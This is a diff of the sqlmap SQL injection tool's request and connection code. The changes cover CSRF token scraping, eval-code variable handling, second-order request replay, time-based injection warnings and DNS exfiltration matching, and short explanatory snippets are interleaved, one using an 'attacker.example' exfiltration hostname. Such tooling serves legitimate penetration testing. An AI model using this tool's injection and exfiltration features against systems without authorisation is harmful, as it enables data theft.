+if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path)
+value = urlencode(value, spaceplus=kb.postSpaceToPlus)
+payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus)
 value = agent.replacePayload(value, payload)
+postUrlEncode = False

 if conf.hpp:
 if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
@@ -862,7 +869,7 @@ class Connect(object):
 singleTimeWarnMessage(warnMsg)
 if place in (PLACE.GET, PLACE.POST):
 _ = re.escape(PAYLOAD_DELIMITER)
-match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)
+match = re.search(r"(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)
 if match:
 payload = match.group("value")

@@ -921,29 +928,31 @@ class Connect(object):

 if value and place == PLACE.CUSTOM_HEADER:
 if value.split(',')[0].capitalize() == PLACE.COOKIE:
-cookie = value.split(',', 1)[1]
+cookie = value.split(',', 1)[-1]
 else:
-auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
+auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]

 if conf.csrfToken:
 def _adjustParameter(paramString, parameter, newValue):
 retVal = paramString
-match = re.search("%s=[^&]*" % re.escape(parameter), paramString)
+match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString)
 if match:
 retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString)
 else:
-match = re.search("(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
+match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
 if match:
 retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
 return retVal

 page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
-match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
-token = (match.group(2) or match.group(3) or match.group(4)) if match else None
+token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")

 if not token:
-match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
-token = match.group(1) if match else None
+token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
+
+if not token:
+match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
+token = match.group(1) if match else None

 if not token:
 if conf.csrfUrl != conf.url and code == httplib.OK:
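The rewritten token lookup above relies on extractRegexResult(), a helper that returns the content of the named "result" group of a match. A minimal hedged equivalent using only the standard re module, run against a made-up HTML form (the field name csrf_token, its value and the page are all illustrative):

```python
import re

def extract_regex_result(regex, content, flags=0):
    # Minimal stand-in for the helper used above: return the content of the
    # named group "result" from the first match, or None if nothing matches.
    match = re.search(regex, content or "", flags)
    return match.group("result") if match else None

html = '<form><input type="hidden" name="csrf_token" value="d41d8cd98f"></form>'
pattern = r"(?i)<input[^>]+\bname=[\"']?csrf_token[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))"
token = extract_regex_result(pattern, html)
print(token)               # "d41d8cd98f  (leading quote captured by the pattern)
print(token.strip("'\""))  # d41d8cd98f - the same strip the new code applies later
```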
@@ -968,9 +977,11 @@ class Connect(object):
 if not conf.csrfUrl:
 errMsg += ". You can try to rerun by providing "
 errMsg += "a valid value for option '--csrf-url'"
-raise SqlmapTokenException, errMsg
+raise SqlmapTokenException(errMsg)

 if token:
+token = token.strip("'\"")
+
 for place in (PLACE.GET, PLACE.POST):
 if place in conf.parameters:
 if place == PLACE.GET and get:
@@ -1018,18 +1029,24 @@ class Connect(object):
 for part in item.split(delimiter):
 if '=' in part:
 name, value = part.split('=', 1)
-name = re.sub(r"[^\w]", "", name.strip())
-if name in keywords:
+name = name.strip()
+if safeVariableNaming(name) != name:
+conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode)
+name = safeVariableNaming(name)
+elif name in keywords:
 name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
-value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
+value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
 variables[name] = value

 if cookie:
 for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
 if '=' in part:
 name, value = part.split('=', 1)
-name = re.sub(r"[^\w]", "", name.strip())
-if name in keywords:
+name = name.strip()
+if safeVariableNaming(name) != name:
+conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode)
+name = safeVariableNaming(name)
+elif name in keywords:
 name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
 value = urldecode(value, convall=True)
 variables[name] = value
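The change above routes parameter names that are not valid Python identifiers through a safeVariableNaming()/unsafeVariableNaming() pair before they are exposed to --eval code. The helper's implementation is not part of this diff, so the snippet below is only a plausible sketch of the idea (hex-encode the offending name behind a fixed prefix so it survives as an identifier); the prefix and function names are hypothetical, not sqlmap's actual code:

```python
import binascii
import re

EVALCODE_ENCODED_PREFIX = "EVAL_"  # hypothetical prefix, for illustration only

def safe_variable_naming(name):
    # Names such as "user-agent" or "a.b" cannot be used as Python variables
    # inside the --eval code, so encode them into a valid identifier.
    if re.search(r"[^\w]", name):
        return "%s%s" % (EVALCODE_ENCODED_PREFIX, binascii.hexlify(name.encode()).decode())
    return name

def unsafe_variable_naming(name):
    # Reverse operation, used when copying evaluated values back into the request.
    if name.startswith(EVALCODE_ENCODED_PREFIX):
        return binascii.unhexlify(name[len(EVALCODE_ENCODED_PREFIX):]).decode()
    return name

print(safe_variable_naming("user-agent"))                # EVAL_757365722d6167656e74
print(unsafe_variable_naming("EVAL_757365722d6167656e74"))  # user-agent
```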
@@ -1040,10 +1057,18 @@ class Connect(object):
 except SyntaxError, ex:
 if ex.text:
 original = replacement = ex.text.strip()
-for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
-if _ in keywords:
-replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
-break
+if '=' in original:
+name, value = original.split('=', 1)
+name = name.strip()
+if safeVariableNaming(name) != name:
+replacement = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), replacement)
+elif name in keywords:
+replacement = re.sub(r"\b%s\b" % re.escape(name), "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX), replacement)
+else:
+for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
+if _ in keywords:
+replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
+break
 if original == replacement:
 conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
 break
@@ -1063,6 +1088,11 @@ class Connect(object):
 del variables[variable]
 variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value

+if unsafeVariableNaming(variable) != variable:
+value = variables[variable]
+del variables[variable]
+variables[unsafeVariableNaming(variable)] = value
+
 uri = variables["uri"]

 for name, value in variables.items():
@@ -1075,33 +1105,33 @@ class Connect(object):
 if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
 if re.search(r"<%s\b" % re.escape(name), post):
 found = True
-post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
+post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
 elif re.search(r"\b%s>" % re.escape(name), post):
 found = True
-post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
+post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)

 regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
 if not found and re.search(regex, (post or "")):
 found = True
-post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
+post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)

 regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
 if not found and re.search(regex, (post or "")):
 found = True
-post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
+post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)

 if re.search(regex, (get or "")):
 found = True
-get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
+get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)

 if re.search(regex, (query or "")):
 found = True
-uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
+uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)

-regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
+regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
 if re.search(regex, (cookie or "")):
 found = True
-cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
+cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)

 if not found:
 if post is not None:
@@ -1117,7 +1147,7 @@ class Connect(object):
 if post is not None:
 if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
 post = getattr(post, UNENCODED_ORIGINAL_VALUE)
-elif kb.postUrlEncode:
+elif postUrlEncode:
 post = urlencode(post, spaceplus=kb.postSpaceToPlus)

 if timeBasedCompare and not conf.disableStats:
@@ -1128,11 +1158,11 @@ class Connect(object):

 if conf.tor:
 warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
-warnMsg += "time-based injections because of its high latency time"
+warnMsg += "time-based injections because of inherent high latency time"
 singleTimeWarnMessage(warnMsg)

 warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
-warnMsg += "larger statistical model, please wait"
+warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of")
 dataToStdout(warnMsg)

 while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
@@ -1205,8 +1235,10 @@ class Connect(object):
 warnMsg += "behavior in custom WAF/IPS/IDS solutions"
 singleTimeWarnMessage(warnMsg)

-if conf.secondOrder:
-page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
+if conf.secondUrl:
+page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
+elif kb.secondReq:
+page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)

 threadData.lastQueryDuration = calculateDeltaSeconds(start)
 threadData.lastPage = page
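The hunk above extends second-order handling: besides a fixed conf.secondUrl, a recorded follow-up request stored in kb.secondReq (url, method, post data, cookie, headers) can be replayed after every injected request, and the resulting page is the one used for comparison. A rough sketch of that control flow with generic names (get_page stands in for the page-fetching call; none of this is sqlmap's actual API):

```python
# Rough sketch (generic names): after sending the injected request, fetch the
# page where the payload's effect actually shows up and hand it back to the
# comparison logic.
def fetch_second_order(get_page, second_url=None, second_req=None):
    if second_url:
        # Fixed URL supplied as an option
        return get_page(url=second_url, raise404=False, refreshing=True)
    elif second_req:
        url, method, post, cookie, headers = second_req
        # Replay a full recorded request (e.g. one loaded from a file)
        return get_page(url=url, method=method, post=post, cookie=cookie,
                        auxHeaders=dict(headers), raise404=False, refreshing=True)
    return None, None, None
```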
@@ -1227,7 +1259,11 @@ class Connect(object):
 page = removeReflectiveValues(page, payload)

 kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
-kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
+message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I)
+if message:
+kb.permissionFlag = True
+singleTimeWarnMessage("potential permission problems detected ('%s')" % message)

 if content or response:
 return page, headers, code
@@ -1237,5 +1273,5 @@ class Connect(object):
 else:
 return comparison(page, headers, code, getRatioValue, pageLength)

-def setHTTPHandlers(): # Cross-linked function
+def setHTTPHandlers(): # Cross-referenced function
 raise NotImplementedError
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import time

@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import os
@@ -94,7 +94,7 @@ class DNSServer(object):

 with self._lock:
 for _ in self._requests:
-if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
+if prefix is None and suffix is None or re.search(r"%s\..+\.%s" % (prefix, suffix), _, re.I):
 retVal = _
 self._requests.remove(_)
 break
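The DNSServer hunk above only converts the matching pattern to a raw string; the pattern itself looks for a known prefix and suffix wrapped around data exfiltrated through forced DNS resolution. A tiny standalone illustration of that match (the prefix, suffix and queued hostname are made up):

```python
import re

# Illustrative values - in practice prefix/suffix come from the injected
# payload and the hostname is a lookup observed by the fake DNS server.
prefix, suffix = "abc123", "xyz789"
requests = ["abc123.73716c6d6170.xyz789.attacker.example"]

for hostname in requests:
    if re.search(r"%s\..+\.%s" % (prefix, suffix), hostname, re.I):
        print("matched exfiltrated chunk in %s" % hostname)
```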

@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import distutils.version
@@ -12,6 +12,7 @@ import socket
 import urllib2

 from lib.core.common import getSafeExString
+from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
@@ -48,7 +49,7 @@ class HTTPSConnection(httplib.HTTPSConnection):

 # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
 # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
-if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"):
+if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and not any((conf.proxy, conf.tor)) and hasattr(ssl, "SSLContext"):
 for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
 try:
 sock = create_sock()
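The amended condition above skips the ssl.SSLContext branch when a proxy or Tor is in use; the branch exists so the TLS handshake can carry the requested hostname (SNI), which name-based virtual-hosted HTTPS targets need in order to present the right certificate. A minimal, generic illustration with the standard library (www.example.com is a placeholder; this is not sqlmap's handler code):

```python
import socket
import ssl

host = "www.example.com"  # placeholder target

# wrap_socket(..., server_hostname=host) puts the hostname into the TLS
# ClientHello (SNI), so name-based virtual hosts can pick the matching
# certificate - the capability the kb.tlsSNI branch above is probing for.
context = ssl.create_default_context()
sock = socket.create_connection((host, 443), timeout=10)
tls = context.wrap_socket(sock, server_hostname=host)
print(tls.getpeercert().get("subject"))
tls.close()
```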
Some files were not shown because too many files have changed in this diff.